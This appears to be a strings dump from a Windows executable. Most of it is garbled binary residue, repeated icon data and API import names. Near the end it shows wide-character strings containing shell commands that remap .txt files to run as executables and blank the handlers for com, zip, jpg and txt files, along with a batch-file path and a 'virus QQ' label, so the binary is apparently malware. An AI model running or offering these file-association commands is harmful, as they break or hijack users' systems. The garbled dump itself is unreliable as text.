Hu3d(hh
TYYh,T
nT``]T\
T#YYh,T
SS((SXXSM_^d
ZN48V0E
NLPVHE
NptVlE
2O@DV<E
hO(,V$E
OdhV`E
PX\VTE
|q!|^%|K=Pq
Wffffff
YY]j`h
3{FF3f
FFW](j
w\SVP9
YE;t:FHE;r
9}uX;u
E;t0FHE;r
9}u";u
EE;u`9=t
3CSVW5`
UQQSVWd5
SVWE3PPPuu
E_^[E]
USVWUj
P(RP$R
t5|$(t
;t$(v(4v
UQPXY]Y[
@@fu+E
fSt8+f
@@fu3[_]
@@fufM
HLNLHPNPP3Y`
vPVLPQE
Y3^_[]
AABBM
tJf9}tDf9Et<}
3F95xr
3MYY[]
31YY[]
SVEW3;
@u+@<v)P
UQSVW>
<"u>"u
3Y[^_5Xr
@B8\t8"u&
UQQSVW39=
W33;u.
;tuf9 t
SSS+S@PWSSE;
;YEt!SSuPuWSS
uGY]]W
;rSVWEP
YYt(V5
PYF,;t
PYF4;t
PYF<;t
PYFD;t
PYFH;t
PYFT=pa
Y}F`E;t
FdE;tM
YYt+V5
3@^p3^
3]3@]h
+SVWEePEEEEd
Y_^[QVC20XC00U
33333]^]
]_^[]UL$
f;rof=p
f;r_f=Z
f;rOf=
rBPf;rAf=*
f;r1f=J
f;r!f=
3"p@d;
VDYYFu
WYYuf_]h0
PyYYtF
YYGG3f
YfdtSfitMfotGfxtAfXu
1ht lt
g~Bit!n
(j-_f;u
YtdV(PW
GGf?^u
f]t`FFf9s
jx^f;tZfXtT
S~YYj0[
ptBuf%
F$|3@_^
k3Y@_^]
W3;u4DP
MOI;|9 M
WI <}}
MLD3#um
#Mj _^{
;]r;]u&
]#\D\D
FF@@u3
YYE@xE@|EpxM
EE8csmu%Ex
EPQ3VW
GuRYMHxMH|>csmu6~
t u$u u
WEPEPVu u
;EsVS;7|B;w
;Er[_^
Wcsm9>
}EPEPWu u
(u$u ]u
VYY_^[
u u$u uu
tP8csmu,9x
U$Ru u
P 3@_^]j
VW_^]M
It7ht<
HHtxHHtt
@@@u3@t
t-RPWS
CYCY~9PM
PvCC>Yt
j ^f;r
It6ht<
}]UZtg
@@@u3@t
t-RPWSH/
uH80t8
A80t.F
EVM(^[
uMSW<t
D=VP YYtG;|fE
YYM_^[@=
r$$w @
W=YEMT
tc;t_F,98uXF4;t
YYF0;t
YYv,}v<uYYF@;
PZvDRYYFP;
vP+YYV#Y_^]
3;t/A,
QoYFd^j
W>+~'WPv
7Y}3u;5@
tVPVDYY3BU y
qtb+tG
VbtFHt+
Y]3u;5@
4VYY y
GIt%t)
Gt/KuD$
GKu[^D$
VPVPV5v
@;rD3Ar
@;vAAy
YE;uo>
EtVMf9MZ
_^[j$h
33F9=lu
u2EPVh|
M3F]39}u
SVeYYE;tuWWSuu
P}YEtnu
fNPSuu
E_WEPE
UDSVWj
E3;}M]
@@Ju;t
;tD9]u?8\
EPSRWjQSv
M_^[.x
BG;U|E
EPSSSjQSv
;F(r(8_
t#F(39]
DDDDDDDDDDDDDD
;|P+;E
ue9t-j
*09)Y+
s 9~(~
j Yj Y+
VWj Y}
Pj Y+3BR0H%
Yj ^+3B
QP4YYu
<+3E_^[
|3@]3]
SVWj ^]
EPEPEWPv
@PEP 3;>v
|!3}MEP^
fYY3j Y+N
3QQQEE
QPEPEP#
EVPM$^vh
3QQQEE
QPEPEP#
EVPdM$^.h
tAt2t$
@u+@PWV
EPVcM s
u5SSWh|
E SSSSu
]M3G9]u
YE;t}SSuuu
e33Mu;u
V?Y;thE
WreY9]t
ev$dv(dv,dv0dv4dv
dv8dv<d@v@dvDdvHdvLdvPdvTdvXdv\
dv`wdvdodvhgdvl_dvpWdvtOdvxGdv|?d@
PWcY^]
PbYv$Dk
VtbY^]UV3PPPPPPPPU
u5EP3GWh|
V`YEn}
e}UWVSM
[^_UV3PPPPPPPPU
t78t2=`
3@_^[]
PYYtbF
EEuzEE
YXS9YtJU
t1SaYP
t@ t20t$@t
/t(;t$;t
8EPuuu
uWEY>j
u|Yj4h@
u8WW3FVh|
YE;t@E
t!SS9]
u1VY9]t
E;tWWu
EPSu u
YMMjDhh
39}t WWu
tjEEb9}u
WWWWVSWu
;tG3Vj
YYE;t43WWVPVSWu
HHtjHHtF
u9S\UC\
}]39Mt
WVE;Yu
;VWEN@
vOE}SLSFEPSS6E
EMu39S
tfEM_^fC
+t5-t00
uFQ3@}
G0t1|
HHu&Mj
PQYuuO
#fEEEEEEEEEEEE?E
PEPfU}Y
EPMYu}
EPNYuO
EPoEPfEPEPEPPEM
0H;s;s
@UWVSu
F'G8t,A<
WN^xd;=g
tXSjYe
EPKYu}
u5}u,e
MuVQTYYM39U
6UWVSM
B8t6t8t't
M}M}M3~M~M~M#
M{M|@F
g~X\~`Q~F~;~(0~
~|UzpzG{LG
Tuy}`}}X}(}}G
Xt}y^}G
X }qzy|<H
X|@izH
(|Xu|j|_|XT|I|X>|3|X(|
x({{X{X{({lI
({{{p{Xe{I
(K{X@{5{I
w(]zRzJ
8zX-z"z K
z(yyy\K
yyy`y(yXyK
|y0qyfy[y(PyXEyX:y`/y$y(
y(xx`x<L
xmtXxxWtxXxxuxtX{xpx(exZxOxXDxxsltL
wwXw(wwPM
uOuX7wM
w`v(vXv
(vXwvlvN
XRvXGvN
X-v("v
q0qH&rlsr
s$Zs`sxsT#
RegCloseKey
RegSetValueExW
RegCreateKeyExW
RegEnumValueW
RegQueryInfoKeyW
RegOpenKeyExW
RegQueryValueExW
RegEnumKeyW
RegEnumKeyExW
RegDeleteKeyW
RegFlushKey
RegDeleteValueW
RegNotifyChangeKeyValue
ADVAPI32.dll
lstrlenW
EnterCriticalSection
InterlockedIncrement
LeaveCriticalSection
InterlockedDecrement
GetSystemDirectoryW
GetCurrentDirectoryW
InitializeCriticalSection
GetFileAttributesW
GetModuleFileNameW
DeleteCriticalSection
CloseHandle
HeapFree
HeapAlloc
GetProcessHeap
lstrcpyW
lstrcmpW
GetWindowsDirectoryW
CompareFileTime
lstrlenA
GetVersionExW
WaitForMultipleObjects
WaitForSingleObject
SetEvent
GetCurrentThreadId
FreeLibrary
LoadLibraryW
GetCommandLineW
CreateEventW
GetSystemInfo
GetFullPathNameW
QueryPerformanceCounter
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetStartupInfoA
GetCommandLineA
GetVersionExA
HeapReAlloc
RtlUnwind
ExitThread
TlsSetValue
TlsGetValue
GetLastError
CreateThread
ExitProcess
GetProcAddress
GetModuleHandleA
WriteFile
GetStdHandle
GetModuleFileNameA
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStringsW
SetHandleCount
GetFileType
TlsFree
SetLastError
TlsAlloc
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
IsBadWritePtr
HeapSize
LoadLibraryA
GetACP
GetOEMCP
GetCPInfo
InterlockedExchange
VirtualQuery
GetStringTypeA
GetStringTypeW
VirtualProtect
MultiByteToWideChar
IsBadReadPtr
IsBadCodePtr
SetFilePointer
LCMapStringA
LCMapStringW
GetLocaleInfoA
SetStdHandle
FlushFileBuffers
CreateFileW
SetEndOfFile
ReadFile
KERNEL32.dll
GetTextExtentPointW
GDI32.dll
EnableWindow
SendMessageW
GetDlgItem
MessageBoxW
LoadStringW
wsprintfW
EndDialog
DialogBoxParamW
GetWindowLongW
CallNextHookEx
PostMessageW
IsWindowEnabled
GetKeyState
DestroyWindow
MessageBoxA
wsprintfA
LoadStringA
SetDlgItemTextW
ShowWindow
CheckDlgButton
SetWindowTextW
ReleaseDC
SetDlgItemInt
GetDlgItemInt
GetDlgItemTextW
CheckRadioButton
LoadIconW
SetForegroundWindow
KillTimer
SetTimer
SetFocus
GetFocus
SetWindowPos
AdjustWindowRectEx
GetWindowRect
CreateDialogParamW
GetClientRect
UpdateWindow
PostQuitMessage
UnhookWindowsHookEx
SetWindowsHookExW
DispatchMessageW
TranslateMessage
IsDialogMessageW
PeekMessageW
MsgWaitForMultipleObjects
GetDesktopWindow
USER32.dll
ImageList_Destroy
ImageList_ReplaceIcon
ImageList_Create
COMCTL32.dll
GetSaveFileNameW
comdlg32.dll
ShellExecuteW
SHELL32.dll
CoInitializeSecurity
CoInitialize
CoCreateInstance
CoUninitialize
ole32.dll
OLEAUT32.dll
I x@oGAkU'9p|B
~QCv)/&D(
uuvHMXB
9;5SM]=];Z] T7aZ%]g']
?Zd;On
7?3=Bz
;1az?aUY~S|
D?$?9'
*?}d|FU>c{
zc%C1<!8G
u7.:3q
#2IZ9W
,%I-64OSk%Y
kkggfffl
{kgfvfffffl
gffffff
{kkfvfffffl
wvffffff{;s{vffffl
7'{kkfgwffff
3fwwfrfffl
k{kvp*ffff
2*gg2*jfff;"f{{kc2ffffl
2*j{"jfffl
;3"*w{p*fff
"g{0*jfff333
wff;30
"j{3""wffs33
""c2*"{fgl
"*z"3wffl7;;;30
" 3wfvl
{kffs;30
*#7fg|;3;3
*#{{wkwv|{;3;;30*gw|
{kkgg|{3;33
jgw;32{g|s3;;;0***g;333
"*{s332"
"*;{;3
"3;33{
#3;3;;;3{
7033ws333;;;;;
{{{{{{
kkggfffl
{kgfvfffffl
gffffff
{kkfvfffffl
wvffffff{;s{vffffl
7'{kkfgwffff
3fwwfrfffl
k{kvp*ffff
2*gg2*jfff;"f{{kc2ffffl
2*j{"jfffl
;3"*w{p*fff
"g{0*jfff333
wff;30
"j{3""wffs33
""c2*"{fgl
"*z"3wffl7;;;30
" 3wfvl
{kffs;30
*#7fg|;3;3
*#{{wkwv|{;3;;30*gw|
{kkgg|{3;33
jgw;32{g|s3;;;0***g;333
"*{s332"
"*;{;3
"3;33{
#3;3;;;3{
7033ws333;;;;;
{{{{{{
kkggfffl
{kgfvfffffl
gffffff
{kkfvfffffl
wvffffff{;s{vffffl
7'{kkfgwffff
3fwwfrfffl
k{kvp*ffff
2*gg2*jfff;"f{{kc2ffffl
2*j{"jfffl
;3"*w{p*fff
"g{0*jfff333
wff;30
"j{3""wffs33
""c2*"{fgl
"*z"3wffl7;;;30
" 3wfvl
{kffs;30
*#7fg|;3;3
*#{{wkwv|{;3;;30*gw|
{kkgg|{3;33
jgw;32{g|s3;;;0***g;333
"*{s332"
"*;{;3
"3;33{
#3;3;;;3{
7033ws333;;;;;
{{{{{{
vvvfff
wffffl
w{kffvff
2{wwvffl
0*kkvpffl
"ws*ffl3
"*k0vls0
"*2"vf;;3
wffs330
{{wk{;;32g
330*gks3
"s0"*#0
;;33;{w3
33w73;;;7{{{{{{{|
vvvfff
wffffl
w{kffvff
2{wwvffl
0*kkvpffl
"ws*ffl3
"*k0vls0
"*2"vf;;3
wffs330
{{wk{;;32g
330*gks3
"s0"*#0
;;33;{w3
33w73;;;7{{{{{{{|
vvvfff
wffffl
w{kffvff
2{wwvffl
0*kkvpffl
"ws*ffl3
"*k0vls0
"*2"vf;;3
wffs330
{{wk{;;32g
330*gks3
"s0"*#0
;;33;{w3
33w73;;;7{{{{{{{|
wgvl2{pf
l;0*vl30'l332gl30*{
0#233;70?kk
wgvl2{pf
l;0*vl30'l332gl30*{
0#233;70?kk
wgvl2{pf
l;0*vl30'l332gl30*{
0#233;70?kk
\djpx~HHVZdjs~@@HV\fs~LBHHQYamxBBLLQQVYdjs~FFLLLH@HSXZdmxFFFBB;;3<CUSYajs~DDD<<333*=ieUV\fpxD><<5%%%
^XZdms~N>>5%%%
$cYajsxNC>5
r[afpx~C>8*
cZdjsxzNC8'
n[\djs{}
cY\flzq
nXY\ce
GgLTW`
q}z]O:"
_enuv~]O:"
hi^ckmpsx]O:
i^[\adfjm~~gW:
^XYYZ\\dpxo]=)
.TQQVVVYfxso]K1
rHHHHQQZp~xpogW=)
^@@@@HVfsppoW=1
o;3;;Q\jfoeK=
<33HVadooW=1
C3@QYdweK7
i>HQVtoWI$
R>LVZweWR
-:<LVtweIE.J
>FSbwteRE.J
M$8<LXyteRE.J
.M$6<FS
teRE.J
weREMJ
yei_`G
!0:9CDTyytiqh`-
(29?CNUw
|}iqRK=:000//+449??NNUUw
|teeWWOAAAAOOPPPPUUty
yoggg]]]^^^^^^orrrrrnnn^^
\djpx~HHVZdjs~@@HV\fs~LBHHQYamxBBLLQQVYdjs~FFLLLH@HSXZdmxFFFBB;;3<CUSYajs~DDD<<333*=ieUV\fpxD><<5%%%
^XZdms~N>>5%%%
$cYajsxNC>5
r[afpx~C>8*
cZdjsxzNC8'
n[\djs{}
cY\flzq
nXY\ce
GgLTW`
q}z]O:"
_enuv~]O:"
hi^ckmpsx]O:
i^[\adfjm~~gW:
^XYYZ\\dpxo]=)
.TQQVVVYfxso]K1
rHHHHQQZp~xpogW=)
^@@@@HVfsppoW=1
o;3;;Q\jfoeK=
<33HVadooW=1
C3@QYdweK7
i>HQVtoWI$
R>LVZweWR
-:<LVtweIE.J
>FSbwteRE.J
M$8<LXyteRE.J
.M$6<FS
teRE.J
weREMJ
yei_`G
!0:9CDTyytiqh`-
(29?CNUw
|}iqRK=:000//+449??NNUUw
|teeWWOAAAAOOPPPPUUty
yoggg]]]^^^^^^orrrrrnnn^^
\djpx~HHVZdjs~@@HV\fs~LBHHQYamxBBLLQQVYdjs~FFLLLH@HSXZdmxFFFBB;;3<CUSYajs~DDD<<333*=ieUV\fpxD><<5%%%
^XZdms~N>>5%%%
$cYajsxNC>5
r[afpx~C>8*
cZdjsxzNC8'
n[\djs{}
cY\flzq
nXY\ce
GgLTW`
q}z]O:"
_enuv~]O:"
hi^ckmpsx]O:
i^[\adfjm~~gW:
^XYYZ\\dpxo]=)
.TQQVVVYfxso]K1
rHHHHQQZp~xpogW=)
^@@@@HVfsppoW=1
o;3;;Q\jfoeK=
<33HVadooW=1
C3@QYdweK7
i>HQVtoWI$
R>LVZweWR
-:<LVtweIE.J
>FSbwteRE.J
M$8<LXyteRE.J
.M$6<FS
teRE.J
weREMJ
yei_`G
!0:9CDTyytiqh`-
(29?CNUw
|}iqRK=:000//+449??NNUUw
|teeWWOAAAAOOPPPPUUty
yoggg]]]^^^^^^orrrrrnnn^^
cjpw~IIQcs~DDDIQcp{E>>336JNUjs~B66-)0uWM_m{B6-&
!khUjs|8)
h_lt=2#
S^hlow~\C
uTV__j{weC+
vNKMUp~seR9
WEIcsmaa9'
fEQjcnH1
FKUnb?(
CDKbq^S.
58DMqvgX
2>GyxgXiX
,+6EbyxgXi
.,'8ENfyxgk
/18BLfyvu}k@!
+1<ABLqxt^H<772::=FJJ]qyrne`\OWWWJJ\eedddWO
cjpw~IIQcs~DDDIQcp{E>>336JNUjs~B66-)0uWM_m{B6-&
!khUjs|8)
h_lt=2#
S^hlow~\C
uTV__j{weC+
vNKMUp~seR9
WEIcsmaa9'
fEQjcnH1
FKUnb?(
CDKbq^S.
58DMqvgX
2>GyxgXiX
,+6EbyxgXi
.,'8ENfyxgk
/18BLfyvu}k@!
+1<ABLqxt^H<772::=FJJ]qyrne`\OWWWJJ\eedddWO
cjpw~IIQcs~DDDIQcp{E>>336JNUjs~B66-)0uWM_m{B6-&
!khUjs|8)
h_lt=2#
S^hlow~\C
uTV__j{weC+
vNKMUp~seR9
WEIcsmaa9'
fEQjcnH1
FKUnb?(
CDKbq^S.
58DMqvgX
2>GyxgXiX
,+6EbyxgXi
.,'8ENfyxgk
/18BLfyvu}k@!
+1<ABLqxt^H<772::=FJJ]qyrne`\OWWWJJ\eedddWO
2DJMQ ;8HLSWU
]?9IO\V
iz7>v}X
ok~dbsYQ
lqwKNM
e|4:HJ#
c`r@'0E-
u`_dh{Z(6")mga^Rnx%=.pjfy
lt,&CB
*$<71/+8?!k
2DJMQ ;8HLSWU
]?9IO\V
iz7>v}X
ok~dbsYQ
lqwKNM
e|4:HJ#
c`r@'0E-
u`_dh{Z(6")mga^Rnx%=.pjfy
lt,&CB
*$<71/+8?!k
2DJMQ ;8HLSWU
]?9IO\V
iz7>v}X
ok~dbsYQ
lqwKNM
e|4:HJ#
c`r@'0E-
u`_dh{Z(6")mga^Rnx%=.pjfy
lt,&CB
*$<71/+8?!k
))77DDQQ__kkppqqooee
((88EEPP[[ffppxx
++::HHVVeeqq}}yy_AA
JJJ t))^ !!&&..55CCOO]]mmzz
DDD"$$ %%--//2244::DDPPZZhhtt
NNN$%%""%%**++**((%%''1199EEQQ__kkxx
ZZZ"$$!!%%$$""
--55BBNN[[gguu
--9977==IIVVbbllxx
CbbZnn@@==FFRR^^hhss||
&KqddBBCCOOZZddnnyyzz
OO7WW?z
BcNNCCLLUU``jjss||zzYY<$$
5Ur^^DDFFPPZZddmmssffd66
(FcMMCCJJSS\\eeeeII/
6UrjjCCCCKKTTZZRRg..
(EcGG<<AAIILL::4
6Uv\\;;77>>99h!!
&FeAA//00''8
3RmNN,,##]
=Up;;d JJ
__ ::^<<yymm
d++GG__ss{{
b""::OO__ffppxx||
((>>MMWW]]``ddmm}}xx
-H}}0077CCKKOORRUUXX^^ppnn
!7SZZ>>==@@CCFFHHJJPPbbxxbb
7Rs[[::4477::;;>>BBUUkkxxWW
*GdOO****++..0066GGbbuunnLL###X
AA@@''
""((<<UUff``BB)))E
==OGG//
11HH[[VV<<5550@@@
''>>NNIIK<<jMMM
BBEE**
1K^n||
""55AA??FFFIiii
==KKK66
'9FW44
))7788AA]]],
FFCC--
++8899XXXQ
>>RKK==%%
//66BBttt.
EEJJ66
%%33<<kkkE
,,88RRk$
??YOOGG33
&&11DD.
DDtPPHH22
%%//<<3
GG~SSJJ55""c
##..::1
FFuRRMM<<((h
$$,,77+
PPBB22p%%H
!!**,,
>>)JJRRMMBB44{))!!
$$,,--//DDF
DDSJJPPLLCC<<33**%%
!!##%%**..11,,00c
<<LFFLL
QQLLFFBB>><<::8877::<<====66
00..Wiii
@@PCCFFHH
JJMMMMKKIIDD
==9911Xz77
))77DDQQ__kkppqqooee
((88EEPP[[ffppxx
++::HHVVeeqq}}yy_AA
JJJ t))^ !!&&..55CCOO]]mmzz
DDD"$$ %%--//2244::DDPPZZhhtt
NNN$%%""%%**++**((%%''1199EEQQ__kkxx
ZZZ"$$!!%%$$""
--55BBNN[[gguu
--9977==IIVVbbllxx
CbbZnn@@==FFRR^^hhss||
&KqddBBCCOOZZddnnyyzz
OO7WW?z
BcNNCCLLUU``jjss||zzYY<$$
5Ur^^DDFFPPZZddmmssffd66
(FcMMCCJJSS\\eeeeII/
6UrjjCCCCKKTTZZRRg..
(EcGG<<AAIILL::4
6Uv\\;;77>>99h!!
&FeAA//00''8
3RmNN,,##]
=Up;;d JJ
__ ::^<<yymm
d++GG__ss{{
b""::OO__ffppxx||
((>>MMWW]]``ddmm}}xx
-H}}0077CCKKOORRUUXX^^ppnn
!7SZZ>>==@@CCFFHHJJPPbbxxbb
7Rs[[::4477::;;>>BBUUkkxxWW
*GdOO****++..0066GGbbuunnLL###X
AA@@''
""((<<UUff``BB)))E
==OGG//
11HH[[VV<<5550@@@
''>>NNIIK<<jMMM
BBEE**
1K^n||
""55AA??FFFIiii
==KKK66
'9FW44
))7788AA]]],
FFCC--
++8899XXXQ
>>RKK==%%
//66BBttt.
EEJJ66
%%33<<kkkE
,,88RRk$
??YOOGG33
&&11DD.
DDtPPHH22
%%//<<3
GG~SSJJ55""c
##..::1
FFuRRMM<<((h
$$,,77+
PPBB22p%%H
!!**,,
>>)JJRRMMBB44{))!!
$$,,--//DDF
DDSJJPPLLCC<<33**%%
!!##%%**..11,,00c
<<LFFLL
QQLLFFBB>><<::8877::<<====66
00..Wiii
@@PCCFFHH
JJMMMMKKIIDD
==9911Xz77
))77DDQQ__kkppqqooee
((88EEPP[[ffppxx
++::HHVVeeqq}}yy_AA
JJJ t))^ !!&&..55CCOO]]mmzz
DDD"$$ %%--//2244::DDPPZZhhtt
NNN$%%""%%**++**((%%''1199EEQQ__kkxx
ZZZ"$$!!%%$$""
--55BBNN[[gguu
--9977==IIVVbbllxx
CbbZnn@@==FFRR^^hhss||
&KqddBBCCOOZZddnnyyzz
OO7WW?z
BcNNCCLLUU``jjss||zzYY<$$
5Ur^^DDFFPPZZddmmssffd66
(FcMMCCJJSS\\eeeeII/
6UrjjCCCCKKTTZZRRg..
(EcGG<<AAIILL::4
6Uv\\;;77>>99h!!
&FeAA//00''8
3RmNN,,##]
=Up;;d JJ
__ ::^<<yymm
d++GG__ss{{
b""::OO__ffppxx||
((>>MMWW]]``ddmm}}xx
-H}}0077CCKKOORRUUXX^^ppnn
!7SZZ>>==@@CCFFHHJJPPbbxxbb
7Rs[[::4477::;;>>BBUUkkxxWW
*GdOO****++..0066GGbbuunnLL###X
AA@@''
""((<<UUff``BB)))E
==OGG//
11HH[[VV<<5550@@@
''>>NNIIK<<jMMM
BBEE**
1K^n||
""55AA??FFFIiii
==KKK66
'9FW44
))7788AA]]],
FFCC--
++8899XXXQ
>>RKK==%%
//66BBttt.
EEJJ66
%%33<<kkkE
,,88RRk$
??YOOGG33
&&11DD.
DDtPPHH22
%%//<<3
GG~SSJJ55""c
##..::1
FFuRRMM<<((h
$$,,77+
PPBB22p%%H
!!**,,
>>)JJRRMMBB44{))!!
$$,,--//DDF
DDSJJPPLLCC<<33**%%
!!##%%**..11,,00c
<<LFFLL
QQLLFFBB>><<::8877::<<====66
00..Wiii
@@PCCFFHH
JJMMMMKKIIDD
==9911Xz77
<<<3l44e::FFWWggvv
UUU'88n..99KK\\rr
_ZZ322000022==IIYYjj||
HHG..%%$$
22<<NNaatt6))
II?&&
w00y??DDWWhhzz
~xx &&
"<`YYDDSSeevv}}~QQ1h
5Y}MMOOaarruuTT)''
*OnccMM\\iibbN))
>`}NNUU[[BB
%Lh[[HHHHN
.Pe;;00
1FgPPA--
N##DDdd
55MM\\eeuu
#9}66BBMMSSWWaa}}ww
<\JJ@@@@DDNNkkii
.Qq[[BB55;;[[ssYY
4Vl{AA//JJbbII
55iKK,,
,EP`,,??OO<<
)) II>>
";%%66<<n66f!!!
<<MM//N
5544<<<3
GGm''+
++66::nCCC
66zRREEe##)
1199UUU'
>>UUEEf%%*
0066c__3
BBXXIIl,,1
++22HHG
??WWOOx;;J&&5
%%0011LL@
VVLL==11##
!!**220000~xx
''488HHSSQQKKEEBB>>==@@AA>>55--55H
!! //g::CC
GGJJJJFF>>
11++p33-
<<<3l44e::FFWWggvv
UUU'88n..99KK\\rr
_ZZ322000022==IIYYjj||
HHG..%%$$
22<<NNaatt6))
II?&&
w00y??DDWWhhzz
~xx &&
"<`YYDDSSeevv}}~QQ1h
5Y}MMOOaarruuTT)''
*OnccMM\\iibbN))
>`}NNUU[[BB
%Lh[[HHHHN
.Pe;;00
1FgPPA--
N##DDdd
55MM\\eeuu
#9}66BBMMSSWWaa}}ww
<\JJ@@@@DDNNkkii
.Qq[[BB55;;[[ssYY
4Vl{AA//JJbbII
55iKK,,
,EP`,,??OO<<
)) II>>
";%%66<<n66f!!!
<<MM//N
5544<<<3
GGm''+
++66::nCCC
66zRREEe##)
1199UUU'
>>UUEEf%%*
0066c__3
BBXXIIl,,1
++22HHG
??WWOOx;;J&&5
%%0011LL@
VVLL==11##
!!**220000~xx
''488HHSSQQKKEEBB>>==@@AA>>55--55H
!! //g::CC
GGJJJJFF>>
11++p33-
<<<3l44e::FFWWggvv
UUU'88n..99KK\\rr
_ZZ322000022==IIYYjj||
HHG..%%$$
22<<NNaatt6))
II?&&
w00y??DDWWhhzz
~xx &&
"<`YYDDSSeevv}}~QQ1h
5Y}MMOOaarruuTT)''
*OnccMM\\iibbN))
>`}NNUU[[BB
%Lh[[HHHHN
.Pe;;00
1FgPPA--
N##DDdd
55MM\\eeuu
#9}66BBMMSSWWaa}}ww
<\JJ@@@@DDNNkkii
.Qq[[BB55;;[[ssYY
4Vl{AA//JJbbII
55iKK,,
,EP`,,??OO<<
)) II>>
";%%66<<n66f!!!
<<MM//N
5544<<<3
GGm''+
++66::nCCC
66zRREEe##)
1199UUU'
>>UUEEf%%*
0066c__3
BBXXIIl,,1
++22HHG
??WWOOx;;J&&5
%%0011LL@
VVLL==11##
!!**220000~xx
''488HHSSQQKKEEBB>>==@@AA>>55--55H
!! //g::CC
GGJJJJFF>>
11++p33-
|CC.33KKmm
88[))))FFWWzz
866dOO^^
9oDD::
CWii ##
>__LL]]zz
ULL99VVnn
2lxx99NN
>>s 2
;1166333
m 22DD1
778FFA
EET$$++;;Z
669GGY::6??
BBAA==11
|CC.33KKmm
88[))))FFWWzz
866dOO^^
9oDD::
CWii ##
>__LL]]zz
ULL99VVnn
2lxx99NN
>>s 2
;1166333
m 22DD1
778FFA
EET$$++;;Z
669GGY::6??
BBAA==11
|CC.33KKmm
88[))))FFWWzz
866dOO^^
9oDD::
CWii ##
>__LL]]zz
ULL99VVnn
2lxx99NN
>>s 2
;1166333
m 22DD1
778FFA
EET$$++;;Z
669GGY::6??
BBAA==11
DDDDDD
DDDDDD
DDDDDD
[xe<P(
[xe<P]
&N(W}/eJX-N8eQ`@bv
000000
000000
NfM0$P(
S0n0$Pn0
0L0Lc0f0O0`0U0D0
n0e[0000
O(uY00k0o0
0eW0D0$P0
O(uY00k0o0
NfM0$P]
0xbW0f0]0n0$P0eQRW0f0O0`0U0D0
BE772A5815A5087495005CFAEF05E050
9B38B5EBD92445D673B002A8CBE953D0
4252AC441217A0AB1EBBE9F2C1D5036F
4252AC441217A0AB1EBBE9F2C1D5036F
B538968EC4C5940D395F6FEC4078B080
EE8CDB9E62F6AB53C7C3241B2E3F49ED
CBC3103851B254409688A6F785D9F21A
C5D7ACC95340E068E4007664183DAD7C
D844D4B560FB9CBEE2800DF7C509A63D
FB38C2BA2A06016788A582611FCCC761
D8BF62A792C73BCC152A16EA7A34009F
ECDDAA2994A26F48C74AA459CB903A23
95E2FF5F9B55DC933BA0939EA3D41E0B
1DB684FD96EAC6F83F7C610B0E59BC3C
4F989CDC9DB79932D15CD266D7107495
885BDEB0871A6F42C34B43FE6C4AB3D7
A7AC0723B46256E1910A5249F965B9BA
0A5E5F7BB40DC4473498137A9946EF85
15E63336E13D37EE1ECDFBAE19E8B625
4FE7E777741336685F848A95051C2EC9
E18363315A661FA8603D458E5D5FD1D9
492CB2EBF8AAC15FF665E65D80379296
D1832484991ED384453E78995E4175D1
21F77A36A1618EAB9A390DA2E01D0863
B9EF236F12D844B98FDF59F0B7C4120C
470EC970E94973EB96C25D1932A62A1A
5D5F8C08527E4C31A0ECBE48C638243A
5D5F8C08527E4C31A0ECBE48C638243A
F06DC8A0103C5178C4B9C950B8B27477
E445C5A252AF3CFDD4E5BBD5E54D6F9B
587EE20D8E3F1ED9F5527628180CC99F
30BCFC9A58F487D2839053A75C026640
DD30DB4651F1F67ACB6B34B61519343C
954251F477538BBEFFEB8C5954FF86D3
9C4A2B88FB7C7476226A571707846B88
71636ACFCBD1C2CDF519B7D5B54A5E8F
3B2CBF68961767627E63727D32A0DBF8
87A1F20FC353CEBC27675A8C13F2525A
534435865D2F21A754D77ACC09197D12
FA0AB87CC620BEC3ABD5D38BE87B2B63
4B8C757F4E7B9D9740E4D795D5128BAC
10514C6757143FC21F9EAACF553A48A4
142D51BEC919C34415BD319273BE4BCE
D20B63D406CACA1D93A3A795D3CDE2A9
479E793FEF3DBA30E8C3F90F0E2ED32F
456EAA00786A22128823292E5EF01B87
4216E42459AD04E98578B5953EABD91C
4216E42459AD04E98578B5953EABD91C
67C1F0D510BC852937CE110BC39B4EF7
718BAAB942C2EB1899AEB1C25913BB45
CCC5C9D272A2B1642ADDAD15AE9D8E96
6ABAA2736F2B0D2D770C705264A6F2A8
BB0AA9C5AC1F4DB67466CE45953E1F2C
02189D6C426766972A81547B97D4F95A
5489C65A20E8262E0436D1F2D14D6B07
CEBE852E816135591CFADF9C1A5B0AA7
c�m�d�.�e�x�e�
M�d�5�_�S�t�r�i�n�g�_�C�a�l�c�
C�:�\�1�2�3�.�b�a�t�
c�m�d�.�e�x�e� �/�c� �a�s�s�o�c� �.�t�x�t� �=� �e�x�e�f�i�l�e�
c�m�d�.�e�x�e� �/�c� �f�t�y�p�e� �c�o�m�f�i�l�e�=�
c�m�d�.�e�x�e� �/�c� �f�t�y�p�e� �z�i�p�f�i�l�e�=�
c�m�d�.�e�x�e� �/�c� �f�t�y�p�e� �j�p�g�f�i�l�e�=�
c�m�d�.�e�x�e� �/�c� �f�t�y�p�e� �t�x�t�f�i�l�e�=�
�z�n�k�z�z�
v�i�r�u�s� �Q�Q� �6�2�1�3�7�0�9�0�2�
V�S�_�V�E�R�S�I�O�N�_�I�N�F�O�
S�t�r�i�n�g�F�i�l�e�I�n�f�o�
0�8�0�4�0�4�B�0�
C�o�m�p�a�n�y�N�a�m�e�
F�i�l�e�D�e�s�c�r�i�p�t�i�o�n�
L�e�g�a�l�C�o�p�y�r�i�g�h�t�
L�e�g�a�l�T�r�a�d�e�m�a�r�k�s�
P�r�o�d�u�c�t�N�a�m�e�
F�i�l�e�V�e�r�s�i�o�n�
P�r�o�d�u�c�t�V�e�r�s�i�o�n�
I�n�t�e�r�n�a�l�N�a�m�e�
O�r�i�g�i�n�a�l�F�i�l�e�n�a�m�e�
V�a�r�F�i�l�e�I�n�f�o�
T�r�a�n�s�l�a�t�i�o�n�
(�&�4�-�2�7�;�
(�&�4�-�2�7�;�
(�&�4�-�2�7�;�
`�\�k�h�c�q�
`�\�k�h�c�q�
`�\�k�h�c�q�
�D�i�r�e�c�t�D�r�a�w�
M�S� �S�h�e�l�l� �D�l�g�
�D�i�r�e�c�t�D�r�a�w� �
�D�i�r�e�c�t�D�r�a�w� �
�D�i�r�e�c�t�D�r�a�w� �
e�p�s�a�t� �n�a�s�t�a�v�e�n�
�o�b�n�o�v�o�v�a�c�
